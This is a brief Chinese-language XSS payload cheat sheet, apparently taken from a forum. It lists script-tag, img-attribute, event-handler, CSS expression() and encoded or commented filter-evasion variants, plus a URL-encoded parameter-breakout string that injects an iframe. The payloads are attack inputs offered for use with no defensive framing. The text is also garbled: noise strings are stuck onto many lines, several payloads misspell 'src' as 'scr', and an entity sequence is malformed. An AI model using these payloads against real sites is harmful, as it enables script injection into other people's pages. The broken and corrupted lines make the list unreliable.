xss

admin

<script>alert("跨站")</script>    (最常用）
<img scr=javascript:alert("跨站")></img>
<img scr="javascrip&#116&#58 alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格）
. X& B  g9 \8 E9 ^/ m; o" s5 H<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
. _( M: F4 j+ n5 @! Y# i<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释）
$ \# U; i  s+ h<img src=vbscript:msgbox ("xss")></img>
" t0 J4 A" q+ K0 n& W! I<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
* ]/ m0 k1 a7 Y7 x<div style={left:exp/* */ression (alert('xss'))}></div>
5 Y" m  U4 H4 A. S* \0 s<div style={left:\0065\0078ression (alert('xss'))}></div>
" I  n6 H6 _! U, Dhtml 实体 <div style={left:&#ｘ0065；xpression (alert('xss'))}></div>
: b% S0 x% O4 Sunicode <div style="{left:expRessioN (alert('xss'))}">

"]}%3Cscript%3Ealert('我又来啦！.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
' y. O/ I0 O! ^